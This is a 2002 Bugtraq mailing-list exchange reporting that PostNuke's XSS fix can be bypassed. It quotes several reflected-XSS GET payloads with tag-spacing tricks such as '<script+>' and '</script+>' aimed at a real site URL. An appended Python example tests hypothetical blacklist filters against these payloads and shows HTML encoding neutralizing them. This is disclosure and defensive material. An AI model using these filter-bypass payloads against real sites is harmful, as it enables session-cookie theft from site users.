[27270] in bugtraq


Re: Postnuke XSS fixed

daemon@ATHENA.MIT.EDU (Sebastian Konstanty Zdrojewski)
Thu Oct 3 15:16:55 2002

Message-ID: <3D9BED5F.5030103@not2you.com>
Date: Thu, 03 Oct 2002 09:10:23 +0200
From: Sebastian Konstanty Zdrojewski <s.zdrojewski@not2you.com>
MIME-Version: 1.0
To: bugtraq@securityfocus.com
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

I saw the problem has been solved, and the GET requests you proposed below no
longer work. But if you use the following GET, the popup appears again:

on the URL http://news.postnuke.com/modules.php

the GET

?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script+>

Best Regards,

Sebastian

Daniel Woods wrote:

  >Humm!
  >
  >Not so fast on the praise :(
  >
  >It only took me a couple of workarounds to find ways to bypass the check.
  >
  >  http://news.postnuke.com/modules.php
  >  ?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script>
  >
  >Using the request...
  >  ?op=modload&name=News&file=article&sid=<\script>alert(document.cookie);</script>
  >gives me the DB Error: message
  >
  >And using the request...
  >  ?op=modload&name=News&file=article&sid=<script+>alert(document.cookie);</script>
  >gives me the Alert Popup and DB Error: message...  the '+' is treated
  >as a blank.
  >
  >Thanks... Dan.

-- 
Sebastian Konstanty Zdrojewski
IT Analyst

Neticon a brand of Every Level S.r.l.
Via Valtellina 16 - 20159 Milano - MI - Italy

Phone    (+39) 02.68.80.731
E-Mail   s.zdrojewski@neticon.it
Website  http://www.neticon.it
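As an added example (not code from the thread or from PostNuke), the following Python shows why the checks discussed in this thread keep getting bypassed: two hypothetical blacklist filters of the kind described are run against the three reported query strings after the server's '+'-to-space decoding, next to an HTML-encoding render that neutralizes all three. The filter functions and the rendering snippet are constructed for illustration, not PostNuke's actual code.

```python
import html
import re
from urllib.parse import unquote_plus

# The three query strings reported in the thread (constructed test input).
# A web server decodes '+' to a space before the application sees the value.
REQUESTS = [
    "?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script>",
    "?op=modload&name=News&file=article&sid=<script+>alert(document.cookie);</script>",
    "?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script+>",
]

def sid_from_query(query: str) -> str:
    """Decode the 'sid' parameter the way a server would ('+' -> space)."""
    for pair in query.lstrip("?").split("&"):
        key, _, raw = pair.partition("=")
        if key == "sid":
            return unquote_plus(raw)
    return ""

def filter_literal(value: str) -> bool:
    """Hypothetical filter v1: rejects only the exact string '<script>'."""
    return "<script>" not in value.lower()

def filter_tag_pair(value: str) -> bool:
    """Hypothetical filter v2: tolerates whitespace in the opening tag but
    still assumes the closing tag is written exactly as '</script>'."""
    return re.search(r"<script[^>]*>.*?</script>", value, re.I | re.S) is None

def render_safe(sid: str) -> str:
    """Mitigation: encode for the HTML text context; no blacklist needed."""
    return f"<p>Article {html.escape(sid, quote=True)} not found</p>"

def has_live_script_tag(markup: str) -> bool:
    """Detection on rendered output: is there still a real <script tag?"""
    return re.search(r"<script\b", markup, re.I) is not None

def evaluate(query: str) -> dict:
    """Return which filters accept the decoded value, whether reflecting it
    unencoded leaves a live tag, and whether the encoded render does."""
    sid = sid_from_query(query)
    return {
        "passes_filter_literal": filter_literal(sid),
        "passes_filter_tag_pair": filter_tag_pair(sid),
        "unsafe_output_live": has_live_script_tag(sid),
        "safe_output_live": has_live_script_tag(render_safe(sid)),
    }
```

Calling `evaluate()` on each entry of `REQUESTS` shows that each filter lets a different variant through, while the encoded render never contains a live tag.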
